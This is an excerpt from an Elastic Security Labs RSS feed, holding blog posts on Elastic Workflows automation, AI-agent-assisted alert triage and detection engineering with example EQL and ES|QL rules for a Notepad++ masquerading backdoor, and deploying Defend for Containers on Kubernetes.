<p>The idea is straightforward: use Workflows for the parts of your automation that are native to Elastic. Alert triage, enrichment from your own indices, case management, and alert status updates. These touch your Elastic data directly, and a native workflow will always be simpler and faster than an external tool making API calls back into Elastic.</p>
<p>For everything else, connectors bridge the gap. We have native connectors for Tines, Resilient, Swimlane, TheHive, D3 Security, Torq, and XSOAR. A workflow can kick off a Tines story, push an incident to Resilient, or trigger any external system via HTTP. Your existing tools handle cross-platform orchestration. Workflows handle what's native. As the capability grows, you can consolidate at your own pace. Nobody's forcing a migration.</p>
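<p>For systems without a native connector, a generic HTTP step is often enough. A sketch; the step type and webhook URL are placeholders:</p>
<pre><code class="language-yaml">  - name: trigger_external_automation
    # Generic HTTP call to an external automation webhook (URL is a placeholder)
    type: http.request
    with:
      url: &quot;https://example.com/webhooks/incident&quot;
      method: POST
      body: &quot;${{ event | json }}&quot;
</code></pre>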
<h2>What's here and what's next</h2>
<p>Workflows is available today. Here's what you can build with it:</p>
<ul>
<li><strong>Alert triggers</strong> connect workflows to detection and alerting rules</li>
<li><strong>Case and alert management</strong> through named Kibana steps (<code>kibana.createCase</code>, <code>kibana.SetAlertsStatus</code>, <code>kibana.addCaseComment</code>, and more)</li>
<li><strong>Direct data access</strong> via Elasticsearch search and ES|QL</li>
<li><strong>39 workflow-compatible connectors</strong> covering threat intel (VirusTotal, AbuseIPDB, GreyNoise, Shodan, URLVoid, AlienVault OTX), ticketing (Jira, ServiceNow), communication (Slack, Teams, PagerDuty, email), SOAR platforms (Tines, Resilient, Swimlane, TheHive, and others), and AI providers</li>
<li><strong>AI steps</strong> for classification, summarization, prompts, and Agent Builder invocation of Elastic Agents and Skills</li>
<li><strong>YAML authoring</strong> with autocomplete, validation, and step testing in Kibana</li>
<li><strong>50+ example workflows</strong> on <a href="https://github.com/elastic/workflows">GitHub</a>, including security-specific templates for detection, enrichment, and response</li>
</ul>
<p>What's coming:</p>
<ul>
<li><strong>Visual workflow builder</strong> for drag-and-drop authoring</li>
<li><strong>In-product template library</strong> to browse and install workflows directly in Kibana</li>
<li><strong>Human-in-the-loop</strong> approvals that pause workflows for human input via Slack, email, or the Kibana UI</li>
<li><strong>Natural language authoring</strong> where AI helps translate intent into working workflows</li>
</ul>
<p>Today, authoring is YAML-based. If you've written detection rules or configured CI/CD pipelines, the learning curve is gentle. The editor has built-in autocomplete, validation, and step testing, and the example library gives you templates to start from. A visual builder is coming to make this accessible to a wider audience.</p>
<h2>Get started</h2>
<p>Elastic Workflows is available now. To start building:</p>
<ol>
<li><a href="https://cloud.elastic.co/registration">Start an Elastic Cloud trial</a> or enable Workflows in your existing deployment under <strong>Stack Management &gt; Advanced Settings</strong></li>
<li>Explore the <a href="https://www.elastic.co/docs/explore-analyze/workflows">Workflows documentation</a></li>
<li>Browse the <a href="https://github.com/elastic/workflows">Elastic Workflow Library on GitHub</a> for security templates you can adapt</li>
<li>Read the <a href="https://www.elastic.co/search-labs/blog/elastic-workflows-automation">introductory technical deep dive</a> for core concepts</li>
<li>See the <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">Chrysalis APT blog</a> for a complete Attack Discovery + Workflows + Agent Builder walkthrough</li>
</ol>
<p>Start with the workflow that would save you the most time tomorrow.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
<enclosure url="https://www.elastic.co/security-labs/assets/images/security-automation-with-elastic-workflows/security-automation-with-elastic-workflows.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[Streamlining the Security Analyst Experience]]></title>
            <link>https://www.elastic.co/security-labs/streamlining-the-security-analyst-experience</link>
            <guid>streamlining-the-security-analyst-experience</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Alert Triage, Investigation, and Response with Elastic's Agentic Security Operations Platform.]]></description>
            <content:encoded><![CDATA[<p>The term <strong>Agentic SOC (Security Operations Center)</strong> is one of the most popular concepts in security today. But what does it truly mean in practice, and how does Elastic Security approach this next evolution of security operations?</p>
<p>In simple terms, an Agentic SOC is a security operations center that has deployed AI Agents and corresponding AI Agent Skills to perform SOC-related workflows such as detection engineering, alert triage, incident investigation, escalation, response, and threat hunting. When these workflows are performed by AI agents, they’re often called “Agentic workflows.” These AI Agents and Skills may run natively in a security operations platform like SIEM, XDR, or security analytics, or they may be layered on top of legacy SIEM as an “AI SOC Agent” or “AI SOC analyst”, or they may even be run from an AI Coding Tool.</p>
<p>Regardless of how they are implemented, the shift to the Agentic SOC is not about AI replacing human analysts; it's about transforming how the SOC functions. To keep pace with rapidly evolving attackers, defenders must leverage AI and autonomous agents to respond as quickly as possible. At its core, an Agentic SOC is defined by how a security operations center uses <strong>AI and agents to protect against adversaries</strong>.</p>
<p>Let’s simplify a successful security operations center to three fundamental pillars, all of which the Agentic SOC significantly enhances:</p>
<ol>
<li><strong>Observe:</strong> The foundation of all security is centralized data—aggregating logs and events into one location, which is the core strength of a SIEM solution.</li>
<li><strong>Detect:</strong> This involves deploying core protections like endpoint-based security (XDR, such as Elastic Defend) and security solution-focused detections (cloud, identity data). This technology drives the generation of high-quality alerts. Elastic, for example, ships over <a href="https://elastic.github.io/detection-rules-explorer/"><strong>1,700 pre-built rules</strong></a> for its SIEM by default, not including its XDR solution's endpoint rule library.</li>
<li><strong>Act:</strong> This is the critical final stage of triaging, investigating, and acting on the generated alerts.</li>
</ol>
<h2>Agentic SOC in Action</h2>
<p>Imagine this real-life scenario unfolding in your Security Operations Center using the Elastic security platform. It begins not with a siren, but with a simple, direct Slack notification. Building on our recent <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">blog</a> on Attack Discovery, Workflows, and Agent Builder, let's further examine how Elastic Security can help you respond to an active attack.</p>
<ol>
<li><strong>The Initial Alert and Immediate Action</strong><br />
Your security analyst receives an urgent notification in their team channel. This message isn't just a heads-up; it points directly to an observed, active attack. Crucially, the Elastic Agentic SOC has already taken decisive, pre-emptive action: a vulnerable host has been isolated from the network to contain the threat and limit potential damage. This was all powered by Elastic Workflows and Elastic Agent Builder processing real-time alert and attack data from Elastic.<br />
<img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image5.png" alt="Example analyst notification in Slack after the AI agent has performed initial triage." title="Example analyst notification in Slack after the AI agent has performed initial triage." /></li>
<li><strong>The Centralized Case</strong><br />
The analyst's next step is a click away, moving from Slack directly to the centralized Case within Elastic that was created by the workflow. Elastic Case Management enables the SOC to coordinate the response and provides a single pane of glass into all aggregated critical information:</li>
</ol>
<ul>
<li>
<p><strong>Attack Summary:</strong> A high-level overview detailing what has occurred using Attack Discovery.</p>
</li>
<li>
<p><strong>Attached Alerts:</strong> The specific security alerts that triggered the initial observation.</p>
</li>
<li>
<p><strong>Observables:</strong> A list of suspicious artifacts (IP addresses, file hashes, domains, etc.) collected from the event.</p>
</li>
<li>
<p><strong>Attached Events:</strong> Events that, while not alerts themselves, provide critical context and are of further interest to the investigation.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image2.png" alt="" /></p>
</li>
</ul>
<ol start="3">
<li><strong>Supporting the Investigation</strong><br />
To support the immediate findings, detailed <strong>Investigations</strong> are attached directly to the Case. These searches allow the analyst to visually and contextually step through the sequence of events leading up to, during, and immediately following the attack.<br />
The Elastic Case also provides instant context by highlighting <strong>Similar cases</strong>. By cross-referencing observables, the system identifies previous incidents involving the same entities or artifacts, providing a deeper understanding of the threat actor's history and potential motives.</li>
<li><strong>The Path to Resolution</strong><br />
The agents don’t just catalog the past; they dictate the future. A clear set of <strong>Next steps and actions</strong> is outlined, with specific team members assigned for review and execution.</li>
</ol>
<p>The analyst then steps through a methodical process to review the automated analysis:</p>
<ol>
<li><strong>Reviewing Findings:</strong> Scrutinizing all aggregated data, alerts, and investigations.</li>
<li><strong>Evidence Collection:</strong> Collecting any additional forensic evidence needed for a complete analysis.</li>
<li><strong>Remediation:</strong> Executing manual or automated actions, such as deleting malicious files or killing persistent processes on the isolated host with Elastic Defend.</li>
<li><strong>Final Release:</strong> Eventually, the host is safely released back to the network, but not before additional, targeted rules or policies are automatically applied to prevent a recurrence based on the lessons learned from this incident.</li>
</ol>
<p>In the Agentic SOC, the analyst moves seamlessly from a high-level alert to a comprehensive investigation to full remediation, all within a unified, intelligent workflow powered by Elastic.</p>
<h2>Elastic Security and Core SIEM Workflows</h2>
<p>Before exploring advanced agentic workflows, it's essential to recognize that Elastic Security already provides a comprehensive suite of core capabilities crucial for modern security operations. This foundation begins with the ingestion of security-relevant data, which is automatically normalized to a common schema, ensuring consistency and ease of analysis. The platform offers Extended Detection and Response (XDR) capabilities via Elastic Defend, a robust detection engine built directly into the Elastic Stack, and sophisticated alert workflows that include built-in correlations to reduce noise and surface true threats.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image4.png" alt="" /></p>
<p>Elastic Security further differentiates itself by tightly integrating key operational functions. This includes entity-based threat hunting, machine learning for anomaly detection and behavior analysis, and comprehensive case management for tracking incidents. Finally, the platform provides end-to-end response and forensic capabilities, enabling security teams to move swiftly from initial alert to investigation and remediation, all within a unified, scalable platform.</p>
<h2>Empowering Analysts with Agentic Capabilities</h2>
<h3>AI-Powered Alert Triage and Prioritization</h3>
<p>The Elastic Security Solution integrates AI capabilities via <strong>Agent Builder</strong> to augment SOC operations and make them truly agentic. This is where efficiency improvements are most keenly felt:</p>
<ul>
<li><strong>Conversational Triage:</strong> A built-in agent is readily available to Tier 1/2 analysts, allowing them to use conversational commands to query and prioritize open alerts (e.g., &quot;What priority alerts should I review from the last 30 days?&quot;). This is the first entry point for using AI to augment SOC operations.</li>
<li><strong>LLM Agnostic Platform:</strong> A key differentiating feature of Elastic's <strong>Agent Builder</strong> is that it is <strong>LLM agnostic</strong>, allowing organizations to pick their preferred model, even locally running models for privacy or regulatory reasons.</li>
<li><strong>Attack Discovery:</strong> This premier feature moves beyond basic triage. It uses LLM configurations to create <strong>higher-order attack detections</strong>, taking hundreds of open alerts and prioritizing them into a small, manageable subset of known attacks or incidents. This dramatically reduces the impact of alert fatigue.</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image3.png" alt="" /></p>
<h3>Enriched Investigations</h3>
<p>Once an attack or incident is found, the agent helps start the investigation:</p>
<ul>
<li><strong>Summarization and Enrichment:</strong> The agent can be used to summarize the attack, identify important artifacts, and conduct automated third-party enrichments (like checking VirusTotal). This tailored experience provides a full assessment, including an attack chain, threat intelligence information, related cases, entity risk scoring, and a full investigation guide.</li>
<li><strong>Case Management:</strong> The agent can be instructed to take immediate action, such as generating a security case and notifying the team in Slack, all through simple conversational commands that execute pre-configured workflows.</li>
</ul>
<h3>Automated Response and Threat Hunting</h3>
<p>The true power of the Agentic SOC is realized through action and automation that goes beyond simple conversation:</p>
<ul>
<li>
<p><strong>Workflows and SOAR-like Automation:</strong> Agents can reference and execute <strong>Workflows</strong>, Elastic's SOAR-like automation tool. These workflows allow analysts to take immediate, complex actions. For example, a command like &quot;Please create a case for this attack, and notify my team in Slack&quot; triggers multiple, pre-defined steps. Further critical response actions, such as <strong>isolating a host</strong>, can be executed with a single workflow action while the investigation continues.</p>
</li>
<li>
<p><strong>AI-Assisted Threat Hunting:</strong> AI assists threat hunters by leveraging <strong>Entity Analytics</strong> and pre-built skills. The agent can be asked to find high-risk hosts and users to begin hunting, and then automatically generate specific ES|QL queries (e.g., &quot;Please tell me the most uncommon processes executed for each host&quot;) to uncover unusual or malicious activity.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/image1.png" alt="" /></p>
</li>
</ul>
<h3>The Mandate of Automation</h3>
<p>For maximum effectiveness, all these steps, from alert triage and enrichment to case creation and host isolation, can be configured to run <strong>automatically</strong> as an Agentic Alert Triage workflow. This allows the system to solve problems as soon as they are discovered, keeping the human analyst in the loop with a consolidated case and all the necessary findings in a single pane of glass.</p>
<p>This approach delivers substantial <strong>efficiency improvements</strong>, making speed the single most important factor in a modern, Agentic SOC.</p>
<h2>Elastic’s Agentic Security Operations Platform</h2>
<p>Whether you use our UI, our agents, or your own, Elastic Security provides a strong, open foundation for modern security operations: best-in-class data architecture, search, workflows, analytics, detection engineering content, and automation.</p>
<h2>Getting started</h2>
<p><strong>Before you get started:</strong> AI coding agents operate with real credentials, real shell access, and often the full permissions of the user running them. When those agents are pointed at security workflows, the stakes are higher: you're handing an automated system access to detection logic, response actions, and sensitive telemetry. Every organization's risk profile is different. Before enabling AI-driven security workflows, evaluate what data the agent can access, what actions it can take, and what happens if it behaves unexpectedly.</p>
<p>Don't have an Elasticsearch cluster yet? Start an <a href="https://cloud.elastic.co/registration">Elastic Cloud free trial</a>. It takes about a minute to get a fully configured environment.</p>
]]></content:encoded>
            <category>security-labs</category>
<enclosure url="https://www.elastic.co/security-labs/assets/images/streamlining-the-security-analyst-experience/streamlining-the-security-analyst-experience.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[Supercharge Your SOC]]></title>
            <link>https://www.elastic.co/security-labs/supercharge-your-soc</link>
            <guid>supercharge-your-soc</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Detection Engineering in the Era of AI Agents - The New Frontier.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>The landscape of cybersecurity is evolving, and the role of the Detection Engineer (DE) is more critical and demanding than ever. Traditionally, this role involves a comprehensive, end-to-end workflow: from threat modeling and telemetry tuning to writing, testing, and maintaining performance-optimized detection rules to flag malicious behavior.</p>
<p><strong>Elastic Security is purpose-built to streamline this entire workflow, empowering DEs - and anyone involved in security operations - to build, manage, and optimize detection rules at scale. This allows security teams to concentrate their efforts on the most critical task: protecting the organization.</strong></p>
<p>The rise of generative AI and, more specifically, advanced AI <strong>coding agents</strong> like Claude and Cursor, is fundamentally changing and supercharging this workflow. These tools are no longer just for general software development; they are becoming expert partners for the Security Operations Center (SOC). By integrating the power of conversational AI, these agents can take high-level security requirements and instantly translate them into validated, workable detection logic.</p>
<h2>From Generalist to Elastic Expert: Agent Skills</h2>
<p>Elastic Security is embracing this shift not only by having native AI capabilities built into our agentic security operations platform, but also by <a href="https://www.elastic.co/search-labs/blog/agent-skills-elastic">open-sourcing <strong>agent skills for 3rd party agentic IDEs</strong></a>, a native platform experience for the entire Elastic ecosystem (Security, Observability, etc.). By loading these skills into any agent runtime, your AI assistant moves from being a generalist to an on-demand expert in Elastic’s tooling. You can then ask your agent to triage alerts or, in this context, expertly create and tune detection rules.</p>
<h2>A Use Case Walkthrough: The Notepad++ Attack</h2>
<p>To illustrate the agent’s power, let’s look at a real-world supply chain attack involving a backdoor targeting the Notepad++ infrastructure, described in Elastic Security Labs’ blog, <a href="https://www.elastic.co/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">“Speeding APT Attack”</a>.</p>
<h3>Instant Conditional Rules</h3>
<p>A detection engineer’s first step is often to create conditional rules based on known Indicators of Compromise (IOCs). To begin, we can instruct the agent to investigate data within Elastic Security, as evidence of the attack was present in our cluster.</p>
<pre><code>&quot;Can you help me create a detection rule that will detect malicious activity similar
 to what I'm seeing in my Elastic Security deployment involving notepad++.exe 
 and BluetoothService.exe?&quot;
</code></pre>
<p>The agent immediately went to work:</p>
<ul>
<li>It rapidly found process lineage and documented attack details.</li>
<li>It extracted key IOCs and found the corresponding MITRE ATT&amp;CK™ mappings.</li>
<li>It generated two foundational rules: one for a suspicious child process spawned by <strong>Notepad++</strong>, and one focusing on the masqueraded executable.</li>
<li>Crucially, the rules were immediately tested against threat emulation data, confirming multiple successful hits.</li>
</ul>
<p>Each step happens quickly, and the built-in validation significantly accelerates the 'test and tune' phase.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image2.png" alt="Agent progress initiating creation of conditional detection rules (Claude Code shown)" title="Agent progress initiating creation of conditional detection rules (Claude Code shown)" /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image7.png" alt="Agent report after creating two conditional detection rules (Claude Code shown)" title="Agent report after creating two conditional detection rules (Claude Code shown)" /></p>
<p>Let’s take a look at the agent-created rule in Elastic Security:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image3.png" alt="Agent-created rule details appear seamlessly in Elastic Security" title="Agent-created rule details appear seamlessly in Elastic Security" /></p>
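<p>A conditional rule of that shape, sketched as an illustrative payload rather than the agent's actual output (the rule name, query, exclusions, and scores are examples):</p>
<pre><code class="language-yaml"># Illustrative sketch of a child-process rule; not the generated rule itself
name: Suspicious Child Process Spawned by Notepad++
type: eql
query: |
  process where event.type == &quot;start&quot; and
    process.parent.name : &quot;notepad++.exe&quot; and
    not process.name : (&quot;explorer.exe&quot;, &quot;werfault.exe&quot;)
severity: high
risk_score: 73
</code></pre>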
<h3>Diving into Advanced ES|QL Aggregation</h3>
<p>Conditional logic is great, but modern threats require more behavioral and entity-focused detections. Using Elastic’s powerful piping language, <a href="https://www.elastic.co/docs/reference/query-languages/esql">ES|QL</a> (Elasticsearch Query Language), the agent was challenged to create an <strong>aggregation-based rule</strong> that looks for generic, suspicious characteristics across tasks, aggregates them, and assigns a dynamic risk score to host and user entities.</p>
<p>The agent delivered, creating an advanced query that looks for suspicious executables, excludes benign directories, and assigns scores based on the activity's risk level. This demonstrates the agent's ability to create sophisticated detections unique to Elastic's capabilities, moving beyond simple lookups to complex entity analytics.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image4.png" alt="Agent creating aggregation-based detection rule (Claude Code shown)" title="Agent creating aggregation-based detection rule (Claude Code shown)" /></p>
<p>Here’s the rule in Elastic Security:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image1.png" alt="More complex aggregation-based rule appears properly in Elastic Security" title="More complex aggregation-based rule appears properly in Elastic Security" /></p>
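<p>The shape of such an aggregation rule, sketched as an illustrative ES|QL query (the index pattern, directory exclusion, risk weights, and threshold are examples, not the agent's output):</p>
<pre><code class="language-yaml"># Illustrative ES|QL rule sketch; all values are examples
type: esql
query: |
  FROM logs-endpoint.events.process-*
  | WHERE process.name LIKE &quot;*.exe&quot;
      AND NOT STARTS_WITH(process.executable, &quot;C:\\Program Files&quot;)
  // Assign a per-event risk weight, then aggregate per entity
  | EVAL risk = CASE(process.parent.name == &quot;services.exe&quot;, 70, 25)
  | STATS total_risk = SUM(risk), event_count = COUNT(*) BY host.name, user.name
  | WHERE total_risk &gt;= 100
</code></pre>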
<h3>Sequential Detections with EQL and Suppression</h3>
<p>To detect multi-stage attacks, a <strong>sequential rule</strong> is essential—if Event A, then Event B, then Event C, then alert. Using the <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/eql">Event Query Language (EQL)</a>, the agent crafted a three-stage sequence matching the attack:</p>
<ol>
<li>Unsigned dropper activity.</li>
<li>Service masquerade (implant deployed).</li>
<li>Final execution for persistence.</li>
</ol>
<p>To make the rule more reliable and reduce noise, suppression logic was then added, focusing on limiting alerts per unique Host ID. This quick iteration shows how an agent can help a detection engineer rapidly move from a basic detection to a highly robust, multi-stage rule.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image6.png" alt="Agent creating advanced sequence-based detection rule (Claude Code shown)" title="Agent creating advanced sequence-based detection rule (Claude Code shown)" /></p>
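<p>The sequence described above can be sketched illustratively; the stage conditions, field values, and suppression settings below are examples, not the generated rule:</p>
<pre><code class="language-yaml"># Illustrative EQL sequence sketch with per-host alert suppression
type: eql
query: |
  sequence by host.id with maxspan=30m
    [process where process.code_signature.trusted == false]
    [file where file.name : &quot;BluetoothService.exe&quot;]
    [process where process.name : &quot;BluetoothService.exe&quot; and
       process.parent.name : &quot;services.exe&quot;]
alert_suppression:
  group_by: [host.id]
</code></pre>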
<h3>The LLM-Augmented Query: Summaries in the Alert</h3>
<p>The ultimate demonstration of the new agentic workflow is using <a href="https://www.elastic.co/security-labs/beyond-behaviors-ai-augmented-detection-engineering-with-esql-completion">Elastic’s <strong>ES|QL COMPLETION syntax</strong></a>. This feature allows an inference model to be referenced <em>directly within the query</em>.</p>
<p>The prompt asked the agent to:</p>
<pre><code>Based off this recent elastic blog,
 https://www.elastic.co/security-labs/beyond-behaviors-ai-augmented-detection-engineering-with-esql-completion, 
 create a rule that incorporates a COMPLETION command with my  default inference 
 model that will summarize findings from attack into one &quot;esql.summary&quot;
</code></pre>
<p><img src="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/image5.png" alt="Agent creating advanced detection rule with included AI Summary (Claude Code shown)" title="Agent creating advanced detection rule with included AI Summary (Claude Code shown)" /></p>
<p>The result? The generated rule didn't just fire an alert; it natively included an <strong>ES|QL summary row</strong> in the alert itself:</p>
<blockquote>
<p>This telemetry shows a masquerading technique where a process named &quot;BluetoothService.exe&quot; is executing from a user's AppData directory with a PE original name of &quot;BDSubWiz.exe&quot; (a legitimate file mismatch), running as SYSTEM with service-like characteristics including spawning from services.exe, indicating persistence establishment (MITRE ATT&amp;CK T1036.004 Masquerading and T1543 Service Persistence). The executable's location in a user directory, combined with SYSTEM-level execution, service persistence indicators, and the name/PE mismatch across multiple events, suggests Defense Evasion and Persistence stages. This represents high severity due to successful SYSTEM-level persistence with active defense evasion through masquerading.</p>
</blockquote>
<p>This cuts triage time dramatically, as analysts no longer need to pivot to a separate runbook to understand the context and severity of the alert.</p>
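<p>As a hedged sketch of what such a rule's query might look like (the index pattern, field choices, and inference endpoint ID below are illustrative assumptions, and the exact <code>COMPLETION</code> syntax may vary across stack versions):</p>
<pre><code class="language-esql">FROM logs-endpoint.events.process-*
| WHERE event.action == &quot;start&quot;
    AND process.name != process.pe.original_file_name
// build a per-event prompt for the inference model
| EVAL prompt = CONCAT(
    &quot;Summarize this masquerading finding in one paragraph: process &quot;,
    process.name, &quot; (PE original name &quot;, process.pe.original_file_name,
    &quot;) executed from &quot;, process.executable)
| COMPLETION esql.summary = prompt WITH { &quot;inference_id&quot; : &quot;my-default-inference&quot; }
| KEEP @timestamp, host.name, process.name, esql.summary
</code></pre>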
<h2>The Agentic SOC is Here</h2>
<p>The collaboration between AI agents and the Elastic Security solution provides a glimpse into Elastic’s <a href="https://www.elastic.co/security-labs/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc"><strong>Agentic SOC</strong></a> of the future. It’s a world where detection engineers can have a conversation, define their intent, and instantly generate, test, and deploy highly sophisticated, context-rich detection rules. This is not about replacing the human expert, but about augmenting their knowledge and accelerating their workflow, allowing them to focus on high-value threat intelligence and modeling.</p>
<h2>Getting started</h2>
<p><strong>Before you get started:</strong> AI coding agents operate with real credentials, real shell access, and often the full permissions of the user running them. When those agents are pointed at security workflows, the stakes are higher: you're handing an automated system access to detection logic, response actions, and sensitive telemetry. Every organization's risk profile is different. Before enabling AI-driven security workflows, evaluate what data the agent can access, what actions it can take, and what happens if it behaves unexpectedly.</p>
<p>Don't have an Elasticsearch cluster yet? Start an <a href="https://cloud.elastic.co/registration">Elastic Cloud free trial</a>. It takes about a minute to get a fully configured environment.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/supercharge-your-soc/supercharge-your-soc.jpg" length="0" type="image/jpeg"/>
        </item>
        <item>
            <title><![CDATA[Linux & Cloud Detection Engineering - Getting Started with Defend for Containers (D4C)]]></title>
            <link>https://www.elastic.co/security-labs/getting-started-with-defend-for-containers</link>
            <guid>getting-started-with-defend-for-containers</guid>
            <pubDate>Thu, 19 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This technical resource provides a comprehensive walkthrough of Elastic’s Defend for Containers (D4C) integration, covering Kubernetes-based deployment, the analysis of BPF-enriched runtime telemetry, and the practical application of policy-driven security controls to monitor and alert on activities within containerized Linux environments.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Linux systems remain a critical foundation for modern infrastructure, particularly in cloud-native environments where containers and orchestration platforms are the norm. As workloads move from long-lived hosts to ephemeral containers, attacker tradecraft shifts as well. Activity that once left persistent artifacts on disk is increasingly confined to short-lived, runtime behavior that can be difficult to capture using traditional log sources.</p>
<p>Detection engineering in these environments, therefore, depends heavily on runtime visibility. Understanding how processes execute inside containers, how files are accessed, and how workloads interact with the host becomes more important than relying on static indicators or post-incident artifacts.</p>
<p>Elastic provides several Linux-focused telemetry sources to support this type of detection work. In <a href="https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd">earlier posts in this series</a>, we focused on host-level visibility using Auditd and Auditd Manager, showing how low-level system events can be translated into high-fidelity detections. In this post, the focus shifts to Elastic’s Defend for Containers: a runtime security integration built specifically for containerized Linux workloads.</p>
<p>The goal of this article is not to document every Defend for Containers feature, but to provide a practical starting point for detection engineers: what data the integration produces and how to reason about that data. In the next part, we will look into how it can be applied to realistic container attack scenarios.</p>
<h2>Streamlined visibility with Defend for Containers</h2>
<p>We are excited to announce the arrival of Defend for Containers in the 9.3.0 release. This integration brings a streamlined approach to container security, offering a strong foundation for visibility in cloud-native infrastructures. Users can leverage a suite of detection rules tailored to defend against modern Kubernetes threats and container-specific vulnerabilities. The arrival of Defend for Containers is accompanied by <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/cloud_defend">a container-specific detection ruleset</a>, designed around realistic container and Kubernetes threat models.</p>
<p>At the time of writing, the Defend for Containers ruleset provides baseline coverage for common container attack techniques, including reconnaissance activity, credential access attempts, kubelet attacks, service account token abuse, interactive process execution, file creation and modification, interpreter abuse, encoded payload execution, tooling installation, tunneling behavior, and multiple privilege escalation vectors. Importantly, all existing container- and Kubernetes-specific detection rules <a href="https://github.com/elastic/detection-rules/pull/5685">have been made compatible with Defend for Containers</a>, allowing previously host-centric logic to operate directly on container runtime telemetry.</p>
<p>This makes Defend for Containers a practical and immediately usable data source for Linux detection engineers focused on behavior-driven runtime detection. The remainder of this post focuses on how that telemetry looks in practice and how it can be applied to real-world container attack scenarios.</p>
<h2>Introduction to Defend for Containers</h2>
<p><a href="https://www.elastic.co/docs/reference/integrations/cloud_defend">Defend for Containers</a> is a runtime security integration that provides visibility into Linux containers as they execute. Instead of relying on static image scanning or post-execution logs, it focuses on observing container behavior in real time.</p>
<p>At a high level, Defend for Containers captures security-relevant runtime events from running containers, such as process execution and file access. These events are enriched with container and orchestration context and shipped into Elasticsearch, where they can be analyzed and used as input for detection rules.</p>
<p>From a detection engineering perspective, Defend for Containers sits at the intersection of traditional Linux behavior and the container context. Processes, syscalls, and file activity remain core signals, but they are now scoped to containers, namespaces, and workloads that may only exist briefly.</p>
<p>Defend for Containers is deployed as part of the Elastic Agent and integrates directly with Elastic Security. Once enabled, it provides a dedicated stream of container runtime events that can be queried using KQL or ES|QL, or consumed directly by detection analytics. This allows detection engineers to apply familiar analysis techniques while accounting for the operational realities of cloud-native workloads.</p>
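<p>For example, a quick ES|QL aggregation over the process stream (the index pattern below is an assumption derived from the <code>cloud_defend.process</code> dataset name) can surface the most active binaries per container image:</p>
<pre><code class="language-esql">// count process executions per container image and binary
FROM logs-cloud_defend.process-*
| WHERE event.category == &quot;process&quot; AND event.action == &quot;exec&quot;
| STATS execs = COUNT(*) BY container.image.name, process.name
| SORT execs DESC
| LIMIT 20
</code></pre>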
<p>In the sections that follow, we will examine Defend for Containers events in more detail and walk through several container attack scenarios to illustrate how this data can be used in practice.</p>
<h3>Defend for Containers setup</h3>
<p>Before you can take advantage of Defend for Containers' runtime visibility and analytics, you need to deploy the integration and configure a policy that defines which events to observe and what actions to take when matching activity is encountered. More information about the integration and its setup can be found <a href="https://www.elastic.co/docs/reference/integrations/cloud_defend">here</a>. At a high level, this setup consists of:</p>
<ol>
<li>Deploying the Defend for Containers integration via Elastic Agent in your Kubernetes environment.</li>
<li>Configuring or customizing the Defend for Containers policy, which consists of selectors that define which operations to match and responses that define what actions to take.</li>
<li>Validating and refining the policy based on observed workload behavior.</li>
</ol>
<h3>Deployment methods</h3>
<p>Defend for Containers is delivered as an Elastic Agent integration and relies on Elastic Agent to collect and forward container runtime telemetry into your Elastic Stack. For Kubernetes workloads, you install the integration via the Elastic Security UI and then enroll agents on your cluster nodes.</p>
<p>The basic deployment flow is:</p>
<p>In the Elastic Security UI, navigate to <a href="https://www.elastic.co/docs/reference/fleet">Fleet</a> and create a new Agent Policy (or add the integration to an existing one). Once the Agent Policy is created, we can add the “Defend for Containers” integration to the policy.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image1.png" alt="Figure 1: Add the integration to the agent policy view" title="Figure 1: Add the integration to the agent policy view" /></p>
<p>Give the integration a name and optionally adjust the default selectors and responses (we will look into the available options further down in this publication). Once “Add integration” is selected, a new Agent Policy with the correct integration should be available.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image5.png" alt="Figure 2: Agent policy integrations overview" title="Figure 2: Agent policy integrations overview" /></p>
<p>For this demonstration, we will leverage the Kubernetes deployment method. To deploy this policy to a workload, we can navigate to Actions → Add agent → Kubernetes. Here, we see instructions for copying or downloading the Kubernetes manifest.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/getting-started-with-defend-for-containers/image19.png" alt="Figure 3: Defend for Containers Kubernetes manifest overview" title="Figure 3: Defend for Containers Kubernetes manifest overview" /></p>
